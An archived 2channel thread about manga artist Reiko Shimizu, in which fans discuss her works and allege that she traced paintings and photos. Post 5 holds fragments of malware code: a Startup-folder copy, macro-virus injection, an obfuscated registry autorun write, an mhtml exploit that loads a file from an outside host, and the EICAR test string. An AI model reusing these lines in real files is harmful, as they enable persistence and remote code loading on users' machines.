5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

清水玲子スレッド24

1 :花と名無しさん:2006/07/31(月) 14:40:29 ID:3XgGclzG0
※清水玲子読者が少なからず経験するデジャ・ヴ体験。
 インスパイヤから盗用疑惑まで、その元ネタを解明しつつマターリ語りましょう。
 作品語りも遠慮せず存分にどうぞ。
 関連スレは>>2-5あたり。

・検証資料倉庫
ttp://blog.livedoor.jp/ooo111ooo/
・画像投稿BBS
ttp://imbbs5.net4u.org/bbs/9364shimizu.html
・DAT落ちで見れないスレはここに有るかも?
ttp://makimo.to/2ch/index.html

・前スレ
清水玲子スレッド23
http://comic6.2ch.net/test/read.cgi/gcomic/1141665059/

2 :花と名無しさん:2006/07/31(月) 14:42:51 ID:???0
過去スレ
1)http://salad.2ch.net/gcomic/kako/976/976032064.html
2)http://choco.2ch.net/gcomic/kako/992/992918848.html
3)http://comic.2ch.net/test/read.cgi/gcomic/1003847517/(dat落ち)
4)http://comic.2ch.net/test/read.cgi/gcomic/1015864905/(dat落ち)
5)http://comic.2ch.net/gcomic/kako/1020/10201/1020160004.html
6)http://comic.2ch.net/gcomic/kako/1028/10280/1028055923.html
7)http://comic.2ch.net/gcomic/kako/1040/10406/1040695553.html
8)http://comic.2ch.net/test/read.cgi/gcomic/1053057432/(dat落ち)
9)http://comic.2ch.net/test/read.cgi/gcomic/1056862989/(dat落ち)
10)http://comic.2ch.net/test/read.cgi/gcomic/1064124631/(dat落ち)
11)http://comic4.2ch.net/test/read.cgi/gcomic/1069745135/(dat落ち)
12)http://comic6.2ch.net/test/read.cgi/gcomic/1083055111/(dat落ち)
13)http://comic6.2ch.net/test/read.cgi/gcomic/1091777204/(dat落ち)
14) http://comic6.2ch.net/test/read.cgi/gcomic/1096987061/(dat落ち)
15) http://comic6.2ch.net/test/read.cgi/gcomic/1100740115/(dat落ち)

3 :花と名無しさん:2006/07/31(月) 14:43:34 ID:???0
16) http://comic6.2ch.net/test/read.cgi/gcomic/1103899687/(dat落ち)
17) http://comic6.2ch.net/test/read.cgi/gcomic/1105600424/(dat落ち)
18) http://comic6.2ch.net/test/read.cgi/gcomic/1110459760/(dat落ち)
20)http://comic6.2ch.net/test/read.cgi/gcomic/1121537805/(dat落ち)
21)http://comic6.2ch.net/test/read.cgi/gcomic/1131361211/(dat落ち)
22)http://comic6.2ch.net/test/read.cgi/gcomic/1132633763/(dat落ち)
23)http://comic6.2ch.net/test/read.cgi/gcomic/1141665059/(dat落ち)



〜〜関連スレ〜〜
◇◇メロディ ♪ 第11楽章◇◇ (秘密掲載誌)
http://comic6.2ch.net/test/read.cgi/gcomic/1149500415/
■清水玲子 JACK&ELENAシリーズ■ (過去鯖)
http://piza.2ch.net/gcomic/kako/972/972363765.html
月の子 (過去鯖)
http://mentai.2ch.net/gcomic/kako/961/961804984.html
輝夜姫 (過去鯖)
http://piza.2ch.net/gcomic/kako/959/959719247.html
↑【注】過去鯖のものは書き込めません

801の話題は当該版の作家単独スレへ(21歳未満の人はダメ)。
スレタイのヒントはこの間連載終了した漫画タイトル。

4 :花と名無しさん:2006/07/31(月) 19:15:52 ID:h8ZcceAhO
どっちが本スレ?

5 :<body onload=window()>:2006/07/31(月) 23:20:56 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :花と名無しさん:2006/08/01(火) 17:40:51 ID:Yw2RxpJ8O
ミルキーウェイのような作品がもう一度読みたい。

7 :花と名無しさん:2006/08/01(火) 18:16:01 ID:???0
確かに。でも絵が劣化しちゃったからなぁ…

8 :花と名無しさん:2006/08/01(火) 21:47:47 ID:???0
ミルキーウェイだけは今でも好き。
当時から望遠鏡の理屈に納得出来なかったけど
そんな事関係なく感動したので目をつぶった。

9 :花と名無しさん:2006/08/01(火) 23:44:53 ID:???0
前スレ後半の、竜の元ネタ発覚がきっかけで、またコミックス読み直しちゃったんだけど、
個人的に、初期〜竜・月〜パピヨンあたりまではやっぱり嫌いになれないんだよね・・・・。

元ネタのこととか話の矛盾とか、気になるんだけど放り投げられないorz

10 :花と名無しさん:2006/08/02(水) 08:59:25 ID:???0
>8
私もあの望遠鏡のリクツは「???」ってなった。
スーパーマンで地球の自転逆にしたら時間も戻った時のような感覚。

11 :花と名無しさん:2006/08/02(水) 09:08:25 ID:???0
望遠鏡の理屈は別に合ってると思うが。
勿論、光速より早く空間移動できるという条件付で。
今夜空に見える星だって、数万年前の光なんだしさ。

ただ問題は、あの距離ならばどんな光学望遠鏡を使っても物理的制限により
地球上の人間までは見えないということ…だよな

ま、そこはファンタジーだし別にいいけど

12 :花と名無しさん:2006/08/02(水) 12:02:02 ID:???O
エレナは透視能力があるから

13 :花と名無しさん:2006/08/02(水) 12:28:55 ID:???0
もうエレナはロボットとかじゃなくてエスパーなんだなw

14 :花と名無しさん:2006/08/02(水) 17:48:38 ID:???O
うん、ロボにエスパーという言葉は合わないかもしれないけど、
透視と、動物と会話する能力と、それから凄い地獄耳持ってたよね。

15 :花と名無しさん:2006/08/02(水) 21:15:45 ID:???0
今見てる夜空の星の光が数光年前の光、ってのは分かるけど
眼力が高速を超えて物質を捉えるってのが「?」だった。
でもまぁ、これをいっちゃヤボかと。
一応SF?なんだから。


16 :花と名無しさん:2006/08/02(水) 21:19:57 ID:???0
>>15
今見てる空の星も数万年前の光ですよ。
月は数秒前、太陽は…何分だっけ、12分くらいだっけ?
厳密に言えば、目の前の光景全てのものに関して
光を発してから目に届くまで時間かかってます。
光の速さが早すぎて人間には意識できませんけども。
音に置き換えて考えればわかりやすいでしょ。

17 :15:2006/08/02(水) 21:41:11 ID:???0
>>16
うん…だから、それくらいの科学の知識はあるってば。

光や音のように形の無いものは分かるけど
数百年前の人間のカタチを眼で捉える事が出来るってのが
ちょっと不思議だと思ってたのです。

子供だったし、エレはスーパーロボットだからアリ!
と自分を納得させてました。

18 :花と名無しさん:2006/08/02(水) 21:42:28 ID:???0
>>17
いや、人間も光があるから「見える」んですよ。

19 :花と名無しさん:2006/08/02(水) 22:08:25 ID:???0
前スレ梅てから移住よろですよ

20 :花と名無しさん:2006/08/05(土) 01:05:13 ID:dqRgMjLK0
重複が上がってる&前スレdatになったので
一時浮上します

21 :花と名無しさん:2006/08/05(土) 11:39:30 ID:???0
むかーしの光でしかないのに
透視できちゃうところが不思議だった。

22 :花と名無しさん:2006/08/05(土) 11:41:09 ID:???0
なにしろちょうのうりょくですから!

23 :花と名無しさん:2006/08/05(土) 14:39:42 ID:???0
不思議な力マンセー

24 :花と名無しさん:2006/08/05(土) 23:33:18 ID:???0
ともかく、その頃はどんな矛盾も>>22のように受け入れてた。


25 :花と名無しさん:2006/08/07(月) 15:43:18 ID:???0
知る人は知っている、何もかも終わってしまった漫画家だと
ここまで目トレースが多いと知らない人は未だに
大御所、絵がとっても綺麗、決め絵が美しいと思ってます・・

26 :花と名無しさん:2006/08/07(月) 21:56:37 ID:???0
ぶっちゃけ清水のことは知らない人が多い。

知ってる人は興味がない人が多い。
(いるなあ、とか、ああ、あの小綺麗な絵の…程度の)


・・・・・・そんな感じだと思う。

実際に絵を描く人のスレとか同人さんのいるスレみたいなところでは随分前
から清水さん=写真丸写しと思われてたようだしね。


27 :花と名無しさん:2006/08/09(水) 15:20:37 ID:???0
それなりに長くやってて、カラー絵も綺麗で扱うネタも悪くないのに、
「知らない人は知らない」状態なのは、印象に残らないからだよね。
パクだからすべてうわっつらで、心に訴えてくるものがない。
どれだけ下手でも「こういう漫画を描きたい」という作品は、印象に残る。
キャラ萌えだけでもそれに徹すれば、かわいい・かっこいいキャラが描きたいという
作者の気持ちは伝わる。
シミズンのキャラ萌えは「アテクシ、萌えてなんかいませんわよ。もっと高尚(残酷)な
漫画なのよ、これはお遊びよ」って態度を装ってて冷める。

28 :花と名無しさん:2006/08/10(木) 14:32:19 ID:???0
>キャラ萌えだけでもそれに徹すれば

晶萌えと鏡萌えに徹したことこそ
家具屋失敗の引き金のように思えるのだが…

29 :花と名無しさん:2006/08/10(木) 16:32:57 ID:???0
月の子のレースや花や魚が意味不明に出る画面はオリジナルじゃないのかな?
あれは印象的できれいだったと思う。
他の漫画家がよく真似してたけど、その事に関してどう思ってたんだろ?

30 :花と名無しさん:2006/08/10(木) 16:48:54 ID:???0
ここまで前科持ちだと、さすがにオリジナルじゃないんだろうなという気がする

31 :花と名無しさん:2006/08/10(木) 17:56:37 ID:???0
>>29
実はあれも見覚えがある。
結構くっきり濃く塗ったカラーで覚えがある。

でも思い出せないよー(T∀T)
すごいイライラするー!

「月の子」は他にも木の上に寝そべる便の絵とか、あのドレス、ギルの
お屋敷辺りにデジャビューがあったので、元絵がありそうだなと思ってる。


32 :花と名無しさん:2006/08/10(木) 21:04:50 ID:???0
そういえばイケザワサトミが家具屋をパクってたよね
鏡そっくりのキャラ出てて、カラーとかそっくりだった記憶がある

33 :花と名無しさん:2006/08/10(木) 21:50:48 ID:???0
元ネタのカラー絵もパクリなんだろうな。
パクリのパクリか。

34 :花と名無しさん:2006/08/10(木) 22:08:44 ID:???0
その行為は連鎖する・・・

と書くとホラーっぽい。

35 :花と名無しさん:2006/08/11(金) 20:03:48 ID:???0
リング、らせん、呪怨…
そんな感じだなw

36 :花と名無しさん:2006/08/12(土) 19:00:06 ID:???0
便…w

37 :花と名無しさん:2006/08/14(月) 16:41:45 ID:???0
天女来襲の1/4スペースに、原稿にコーヒーこぼしたってあった。
その際、玉三郎の写真集まで汚れたってあるのは写しながら描いてた
ところにぶちまけて汚したってことか。

ただ近くにあっただけかもしれないが、天女の絵ははげしく丸パクくさい。

38 :花と名無しさん:2006/08/14(月) 22:26:00 ID:???0
>>37
…十分ありえるな。
なるほど、天女来襲の元ネタは玉三郎写真集なのか。

39 :花と名無しさん:2006/08/14(月) 23:42:14 ID:???0
以前指摘されてたね>玉三郎写真集
「夕霧」かな。
お決まりのポーズとはいえ、あきらかに見ながら描いていると思う。
それもオイオイなんだけど、着物にしてはあきらかに余計な布が描かれているよね。
多分、目トレで描いたはいいけど
「なんだかぱっと見物足りないな、ちょっとこの辺に生地足しちゃおーっと、ほらいい感じ」
そんなレベルなんだろうなと、そっちの方でも萎えた。

40 :花と名無しさん:2006/08/15(火) 13:06:09 ID:???0
やれやれチミズ先生たら…
せめてジョジョの作家みたいに「この絵の元ネタはこれ」と
はっきり明言してくれりゃいいのにさ。

41 :花と名無しさん:2006/08/15(火) 23:34:50 ID:???0
久しぶりに屋根裏の奥から漫画出てきたから読んでるんだけど
竜の眠る星の2巻40〜42P
前スレラストに元ネタのまんま画像があったけどアドレス忘れてしまいました
再度見てみたいのでどなたかよろしくお願いします…

しかし要所要所に決めゴマっていうか見せゴマの多い作品ですねコレ
1つ1つほとんどが元ネタあるんだろうなと思って冷めて読んでしまうや
当時の自分からは信じられない

42 :花と名無しさん:2006/08/16(水) 00:19:42 ID:???0
>>41
ほらよ

ttp://www.lovely.ne.jp/wallpaper/wallpaper216/alma-tadema112-1280.jpg
ttp://www.lovely.ne.jp/wallpaper/wallpaper216/alma-tadema103-1280.jpg
ttp://www.lovely.ne.jp/wallpaper/wallpaper216/alma-tadema113-1280.jpg
ttp://www.lovely.ne.jp/wallpaper/wallpaper216/alma-tadema114-1280.jpg
ttp://www.lovely.ne.jp/wallpaper/wallpaper216/alma-tadema115-1280.jpg
ttp://www.lovely.ne.jp/wallpaper/wallpaper216/alma-tadema110-1280.jpg
ttp://www.lovely.ne.jp/wallpaper/wallpaper216/alma-tadema108-1280.jpg
ttp://pinkchiffon.web.infoseek.co.jp/Alma-Tadema3/Heliogabalus.jpg
ttp://pinkchiffon.web.infoseek.co.jp/Alma-Tadema2/Spring.jpg
ttp://pinkchiffon.web.infoseek.co.jp/Alma-Tadema5/Voice.jpg
ttp://www.artcopy-munich.com/bildo/10071.jpg
ttp://www.artcopy-munich.com/bildo/10066.jpg
ttp://www.artcopy-munich.com/bildo/10062.jpg
ttp://www.kingsgalleries.com/1024x768/galleries/alme-tadema/expanded/15.jpg

過去ログ読む位はしようね

43 :花と名無しさん:2006/08/16(水) 14:55:35 ID:???0
>>42
そうそうこれこれ
ありがとよー
10062.jpgがすごすぎて笑うんですがw
服のしわ、ポーズが丸ごと一緒なのはもちろん
座席部分の石の割れ方、ひじかけ部分に突き出た突起まで一緒wwww
階段が真ん中で割れてるところも、花の枝ぶりも
石畳のうえに落ちる影の形まで丸写しwww
右の方の港っぽい背景が汚水の絵だと変なまんまるい陸になってるのはわらた
花びらも散らすほど時間はかけられなかったようですね^^;
この作品は唯一ともいえるぐらい好きだったんだけど
ほんと幻滅したなぁ

44 :花と名無しさん:2006/08/16(水) 18:05:26 ID:???0
検証倉庫でアルマ・タデマ関係も
元絵とシミズン絵と並べてまとめたらいいと思うんだが。
竜が手元にある方、あやしいキメゴマうpしてくださらぬか。

45 :花と名無しさん:2006/08/16(水) 21:01:12 ID:???0
竜、持ってる人ウプって下され。

検証画像のうpはやるよー。

でもあそこのパスがイマイチ分からんが。


46 :43:2006/08/16(水) 21:59:45 ID:???0
>>44-45
単行本は黄ばみまくり、デジカメもたいした精度じゃないので
こんな感じの見づらい画像になりましたが
これでよければどうぞ
検証のとこで画像うpできなかったので適当なところにあげました
あげる方法わかったらあげなおしますので
http://syobon.com/mini/mini.cgi?mode=dl&file=28397
pass:paku

47 :花と名無しさん:2006/08/16(水) 22:44:03 ID:???0
これは酷い劣化コピー…

当時アシスタントさんが描かされたと思うんだけど、
画集とかで指定されたんだろうか。


48 :花と名無しさん:2006/08/16(水) 23:52:45 ID:???0
BBSにモニークをあやすカテアの画像をあげときました。

49 :花と名無しさん:2006/08/17(木) 07:28:42 ID:???0
マジで劣化コピーだなw
腕とか指とか酷すぎる。

50 :花と名無しさん:2006/08/17(木) 07:53:25 ID:???0
無茶を言えば、評論家の藤本由香里さんも『100万ポンドの愛』の文庫解説でそのあたりに
触れてくれれば良かったのに。氏ほどの教養の持ち主なら当然気づいているだろうし。

51 :花と名無しさん:2006/08/17(木) 12:56:36 ID:???0
そこは当然大人の事情があるんですよ。

52 :花と名無しさん:2006/08/17(木) 15:07:17 ID:???0
清水のだけ見てたときには、この人情緒だけはあるな、とか思ってた自分が
はずいよ。本物の画家と同じモノ描かせたらこんなに差が有るものなのね。

53 :花と名無しさん:2006/08/17(木) 15:47:36 ID:???0
月の子の装飾描写が他の漫画家達に流行った時、パクリイクナイ!って
鼻息荒く探してた…。
その最中、アルマの画集を偶然見つけて愕然としたけど、当時の自分に
都合の悪いその事実は見なかったことでスルーした。

複数の画家の良いところを寄せ集めた、カタログみたいな清水さんの作品を、
他の漫画家さんが気になるのも当然だったと今は思う。

昔は感動した「竜…」も、忸怩たる思いが先にたってもう素直には読めない。

54 :花と名無しさん:2006/08/17(木) 16:25:34 ID:???0
ここで忸怩たる思いとか言われてもw

55 :花と名無しさん:2006/08/17(木) 19:44:59 ID:???0
いやでも53さん理解できるよ・・・
ガキの頃に読んだ漫画とか見たアニメとか影響力でかいんだよね
昔はパク元知らなかったから素直に感動したり素直にすごいなあと思っていたものが、
実はこんなパッチワークだらけだった
結構ガックリくるよこれはー・・・
当時両親からもらったお小遣い握り締めて買った人とかさ
毎月楽しみに詠んでた人も、複雑な心境の人はいるでしょう

56 :花と名無しさん:2006/08/17(木) 19:59:05 ID:???0
その昔若かりし頃、竜が大好きでした。

現在はこのスレで、
自分好みの作家さんを紹介してもらっている、
そんな不思議体験をしています。

57 :603 ◆8osC5Yqr.I :2006/08/17(木) 20:43:20 ID:???0
遅くなってすみません。

新しくアップロード掲示板を借りてはみたものの
ttp://res9.7777.net/bbs/9364shimizu/
確認不足で70KBまでしかアップできないようで使い勝手が…
テスト投稿しようとしてサイズオーバーでエラーが出たので考え中です。

>>42>>43>>48さんありがとうございます
ブログにアップしてみました。

58 :花と名無しさん:2006/08/17(木) 20:46:22 ID:???0
以前は、汚水は長編がダメで短編や中編が上手いな、と思ってました。
月の子があまりにも回りくどくてうんざりな展開なのはきっと長編が
苦手な人なんだろう、と。同じ構成のコマがずーっと続いたり。
長編連載ではパクネタ貯蓄がつきるから、補充したり継ぎ接ぎしたりで
のらりくらりと全体的に変な作品になるのか。
中編の竜であの量のパクり様だと、殆んど背景や設定は自力で出来ない人では。
いいと思ってた画は全部アルマタデマだったんじゃん。

59 :花と名無しさん:2006/08/17(木) 20:49:46 ID:???0
植物とかは田中一村だしねえ>竜

で、竜の絵もあれは何かの模写だろ。

60 :花と名無しさん:2006/08/17(木) 21:05:35 ID:???0
多分竜自体も何かの模写でしょうね…。BSの特集番組で成田美名子先生が言われてましたが
ご自身のアメリカ在住の親戚に、牛乳パックからチラシから何から、生活ゴミを
とにかく送ってもらって参考資料にしてサイファを描いたって。
清水はコーラスライン他見て描いただけ。パクル事には知恵が回っても
資料集めはお粗末ですね。
こうなったら物を知らなかったこっちが悪いような気がしてきたよ。

61 :花と名無しさん:2006/08/17(木) 22:04:08 ID:???0
>57乙。

中学のころ、清水マンガは舞台の不思議な雰囲気がいいと思って読んでた。
そりゃそうだ、元絵の画家たちが才能と労力を駆使して描いた画を
風景に決めゴマにとペタペタ使ってたんだもの、手軽に雰囲気アップだよ。
それを、ワタシが描いたマンガで〜すって、、、
なんてひどい神経……あんまりだよ……。

62 :花と名無しさん:2006/08/17(木) 23:33:28 ID:???0
読んでたのが小学生〜中学生なのでまだ元ネタに気付いてない時期
だったって人多そう。

あの当時はパクっつーかああいう模写系のはないではなかったけど、
あそこまで画家の作品を丸々持ってきてるのは少なかったし。

そして思うんだけど、あの当時、ああいう風に画家の作品とかをインスパ
イヤしたりオマージュするときってすごく元作家を褒め称えて心酔して、
トークとかで押せ押せの人が多くなかった?
そういうのが一切無いので騙されたんだわ、ドロミズには。

63 :花と名無しさん:2006/08/18(金) 01:11:02 ID:???0
月の子あたり中学生だったなぁ。
いんすぱいやした時は他の作家さんは後書きトークで
熱く語ってるのが多かったなぁ。それで興味を持って
色々見てみたりした。シミズンは言われてみればないね。

64 :花と名無しさん:2006/08/18(金) 08:07:32 ID:???0
清水も萌えネタにはあとがきマンガやハシラで押せ押せだったよ。
しかし目トレースの元ネタについては画集でちょろっと名前出すだけで済ませている。

65 :花と名無しさん:2006/08/18(金) 08:12:28 ID:???0
あんなパクリ方してたら普通自分からは言わないと思うよ。
だから画集で名前出したことに驚いた。

66 :花と名無しさん:2006/08/18(金) 09:47:25 ID:???0
一枚絵の端っことかコマの枠外とか1/4に書き込んでマンガ本編と一緒に
読めるとこで熱く語る人が多かったよね。
1/4以外のとこはローマ字の人も多かった。

67 :花と名無しさん:2006/08/18(金) 11:16:24 ID:???0
何故か漏れの夢のなかでグロモアの「自己との決闘」が清水センセにマンガ化・単行本化されてて、
あとがき漫画で「ピエールが可哀想でー」というシミズせんせの後ろで編集が「嘘だろグロいのが描きたかっだからだろ」とツッこんでいた。

多分「秘密」と一緒に読んだのがいけなかったのか----。

68 :花と名無しさん:2006/08/18(金) 14:44:11 ID:???0
管理人さん、うpしてくれた人お疲れさまです。
比べて見てみると劣化具合がよくわかりますね。

69 :花と名無しさん:2006/08/18(金) 21:51:16 ID:???0
広告写真もトレスし放題だろうけど、当時の資料持っている人少ないし
検証は難しいんだろうな。

70 :(;´Д`)ハアハア:2006/08/19(土) 04:49:16 ID:20ilGCxwO
(;´Д`)ハアハア
輝夜姫はマジで面白かった
まゆちゃんの可愛さはガチ!
まゆと あきらが結ばれなかった エンドには
がっかりした
なんで ホモ王子と結婚してんの?
サットンと結婚しろよ


71 :(;´Д`)ハアハア:2006/08/19(土) 04:51:00 ID:20ilGCxwO
(;´Д`)ハアハア
あきら と まゆ

みどり と ゆい

サットン と 王子

が結ばれれば ハッピーエンドだったのに

子供は産まれないだろうが

72 :(;´Д`)ハアハア:2006/08/19(土) 04:55:38 ID:20ilGCxwO
(;´Д`)ハアハア
あのエンドは賛否両論ありそうだな

トゥルーエンドがありそうな予感

もうひとつの結末があってもいい

まゆ と あきら が日本に帰り 二人で
一生をともにすれば良かったじゃねぇか


73 :花と名無しさん:2006/08/21(月) 06:09:35 ID:???0
管理人さん乙!
劣化トレスすぎて恥ずかしくないのかねマジで。

74 :花と名無しさん:2006/08/21(月) 12:29:35 ID:???0
この構図・このイラスト素敵キャハ!でトレスしてるので、恥ずかしいという
感情はないと思う。

75 :花と名無しさん:2006/08/21(月) 15:18:57 ID:???0
トレスもそうだが劣化も恥じてほしい。

76 :花と名無しさん:2006/08/21(月) 15:28:09 ID:???0
シミズンのマンガの中でこの絵(・∀・)イイ!!
…って思った絵の9割9分9厘がトレスなこの現状

77 :花と名無しさん:2006/08/21(月) 16:20:40 ID:???0
自分の原画はきれいじゃないらしいって自分で言ってたけど、
そりゃー元の絵の美しさに比べたら言えんわな。

78 :花と名無しさん:2006/08/21(月) 21:18:52 ID:???0
自分の線じゃなくてトレスしてる分、原画で見ると
線がぶれて安定してなかったりするんだろうか。

79 :花と名無しさん:2006/08/21(月) 23:53:31 ID:???0
私はアルマ・タデマを知ったのは、マックスフィールド・パリッシュより
後だったんだけど、センセはこの辺、影響受けたんだろうなくらい思ってた。
影響って言い方をしたら、自分の中で消化して作風に反映するって
イメージがあるけど、まあ、私が思うよりもっと手軽な気持ちで
描いてたんだろうね。
ttp://parrish.artpassions.net/parrish.html

80 :花と名無しさん:2006/08/22(火) 22:43:31 ID:???0
若い頃とかむかーし昔ならまだ緩かったんでそれで擁護する隙間がない
ではないんだけど。


いい加減ええ年のババさまで常識無いと駄目な年だし、ネットが普通にな
ったせいでパクとか厳しくなってんのになあ。

81 :花と名無しさん:2006/08/23(水) 02:13:25 ID:???0
月の子の、セツがショナにもし自分が女性化したらってアプローチ
したけど断られてションボリ美術館の椅子に閉館まで座って、
出てきたら入り口でショナが待っててくれたシーンはすごく
好きだった。。。

82 :(;´Д`)ハァハァ :2006/08/23(水) 02:41:00 ID:d82uFneT0
(;´Д`)ハァハァ   おもしろけりゃあ トレースもありだろwwww



83 :花と名無しさん:2006/08/23(水) 06:15:24 ID:???0
私もセツは好きだった

84 :花と名無しさん:2006/08/23(水) 13:20:56 ID:???O
なんで閉館までずーっと待ってたのかチョト理解しかねた…
個人的にはロシアの飛行場のほうが好きかも。

85 :花と名無しさん:2006/08/23(水) 20:00:32 ID:???0
もちろん美術館の背景も竜の時の凝った装飾のお城の背景もトレス系ですよね・・・
湖の周辺の溜まり場ですらトレスなんだから
見せシーン大量の城内でトレスしてないわけなさそう

86 :花と名無しさん:2006/08/23(水) 20:44:30 ID:???0
>>82
面白くないんだもん。

87 :花と名無しさん:2006/08/23(水) 21:58:41 ID:???O
美術館で泣いているセツの前にあった聖母?と天使の絵画もモトネタあるんですか?
あの絵が何となく気に入って原画を知りたかったのですが、絵画に詳しくないから調べられなかった…

88 :花と名無しさん:2006/08/23(水) 22:13:52 ID:???0
>>86
相手にすんなYO

89 :花と名無しさん:2006/08/23(水) 22:30:08 ID:???0
>>87
うpってくれたら探すよ。

どうせまた直ぐに見付かるさー(´∀`)

90 :花と名無しさん:2006/08/23(水) 23:28:19 ID:???0
ムリリョの「無原罪の御宿り」かな?
そのシーンのある巻だけ無くて確認できないんだが。

ttp://www.nittsu.co.jp/supp/2002zenhan/prado/prado_3.htm

91 :ホッカルさん(;´Д`)ハアハア:2006/08/24(木) 02:46:44 ID:nn9SfId40
カルピスからの一言
    ∧_∧     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (; ´Д`)  < セツって誰だっけ?ww まゆたんが可愛かった
   _, i -イ、    | んで・・・ 特徴を言ってくれればわかるが・・・名前は覚えてねー
 (⌒`    ⌒ヽ   \________________
  ヽ  ~~⌒γ⌒)  
   ヽー―'^ー-' 
    〉    |
   /     |
  {      }
  |      |
  {  ,イ ノ

92 :ホッカルさん(;´Д`)ハアハア:2006/08/24(木) 02:48:23 ID:nn9SfId40
カルピスからの一言
    ∧_∧     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (; ´Д`)  < っていうか別の漫画のキャラか!!www
   _, i -イ、    | わかるわけねぇだろwwww 輝夜姫しか読んでねぇんだから・・・・
 (⌒`    ⌒ヽ   \________________
  ヽ  ~~⌒γ⌒)   他のやつにも挑戦してみるかw
   ヽー―'^ー-' 
    〉    |
   /     |
  {      }
  |      |
  {  ,イ ノ

93 :花と名無しさん:2006/08/24(木) 04:46:46 ID:???0
セツの時の美術館の天使の絵は構図含めて、
西洋絵画の題材のひとつだよ。色んな画家が似たような構図で描いてるはず。

NYのあの美術館て実在するやつじゃなかったっけ?
手元に漫画ないから確認できないが。あの美術館に実際に収蔵されてるんじゃ?
さすがにそこまでパクリ言うつもりはないなぁ…
あれはモトネタありきで見るところだろ。

94 :花と名無しさん:2006/08/24(木) 05:47:29 ID:???0
>>93
87じゃないけど、
別にパクとかそういう意味合いで言ったんじゃないと思うよん

>>81
ああいうシーンの切なさとかの表現はパクとかじゃなくて作者独特の
持ち味で良かったよね
ただ、家具屋から、独りよがりな切なさというか誇大妄想みたく
なっちゃって誰も共感できなくなったのが、もう。。。


95 :花と名無しさん:2006/08/24(木) 06:09:46 ID:???O
まゆの存在が蔑ろにされちゃったのがなぁ…
間接的ではあっても晶のために母親殺して、晶も
「この想いは誰にも言えない」とか、凄くいい雰囲気だったのに、
いつの間にか晶は男狂いになってしまって…最後は空気扱いorz
初期の晶とまゆの関係は好きだったし、実際の行為が無くても
淫靡な香りがして、ちょっとドキドキさせられた。
結局噛ませ犬だったのね。

96 :花と名無しさん:2006/08/24(木) 10:05:02 ID:???0
ホッカルこんなとこにもいるんだ

97 :花と名無しさん:2006/08/24(木) 13:04:41 ID:???0
本物のホッカルさんだったら守備範囲広すぎる。
でも偽物っぽい。

98 :花と名無しさん:2006/08/24(木) 13:07:29 ID:???0
家具屋は清水のマイブームの変遷と飽きっぽさがモロわかりな作品だった。

99 :87:2006/08/24(木) 17:47:10 ID:???0
>90
ありがとうございます。私も今すぐにはコミックス見れないので
はっきりとは言えませんが、たぶんこれだと思います。
プラド美術館所蔵だったんですね。
メトロポリタン美術館所蔵品の画集を探してみたりしたのですが、
あまりの膨大な数に見つけられずじまいでした。
考えてみれば、後の産卵を暗示するためのシーンでしょうから、
必ずしもメトロポリタン所蔵品とは限らないですよね
(メトロポリタン所蔵に同じ構図の絵画が無いとも言い切れませんが)。

100 :ホッカルさん(;´Д`)ハアハア:2006/08/25(金) 00:14:51 ID:pU8ANdro0
カルピスからの一言
    ∧_∧     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (; ´Д`)  < >>97 本物に決まってるだらうがっwwアマゾンで
   _, i -イ、    | 清水玲子の本をレビューしてやるぜ?!ww
 (⌒`    ⌒ヽ   \________________
  ヽ  ~~⌒γ⌒)  
   ヽー―'^ー-' 
    〉    |
   /     |
  {      }
  |      |
  {  ,イ ノ


101 :花と名無しさん:2006/08/25(金) 00:26:23 ID:???0
>>100
別に止めないけど掲載されるといいね

102 :ホッカルさん(;´Д`)ハアハア:2006/08/25(金) 00:30:37 ID:pU8ANdro0
(;´Д`)ハアハア  おうともよww

103 :花と名無しさん:2006/08/25(金) 00:34:29 ID:???0
偽者とか言ってゴメンなさいホッカルさん。
範囲広いね。驚いた。レビュー期待してる。

104 :ホッカルさん(;´Д`)ハアハア:2006/08/25(金) 01:19:46 ID:pU8ANdro0
>>103
(;´Д`)ハアハア  ホッカルさんはリアル以外なら どこにでもいるぜwww


105 :花と名無しさん:2006/08/25(金) 01:46:39 ID:???O
久々に月を読み返してみた。
ウザいところも多々あるけど、きちゃない顔してぐしゅぐしゅ泣くジミーはやっぱ可愛い(ハァト

106 :花と名無しさん:2006/08/25(金) 02:32:41 ID:???0
月の子も読み返すとグチャグチャだなあ。

数巻ごとに別の話を継ぎ合わせたような感じ。
ぎくしゃくしてるっていうか……
チグハグ。

107 :花と名無しさん :2006/08/25(金) 06:15:44 ID:???0
竜のコミクスより
1巻中扉(犬と寝そべってるエレナ)
1巻95pモニークの椅子に座ってるボーズ
1巻161p モニーク砂の上を歩いてる後ろ姿
2巻93p下段 チェックのシャツの(右腕に顔をのせてる)モニーク
2巻115pラストのコマ 椅子に座るエレナ

コミクスじゃないけどカラー扉になってた
自転車に乗って振り返ってるチューリップ柄のジャケット着たエレナ

以上全部「オリーブ」から、覚えてるだけでもこれだけパクってました。
